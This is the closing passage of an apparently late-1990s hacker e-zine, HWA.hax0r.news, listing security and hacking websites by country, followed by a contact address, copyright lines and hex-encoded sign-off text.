Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]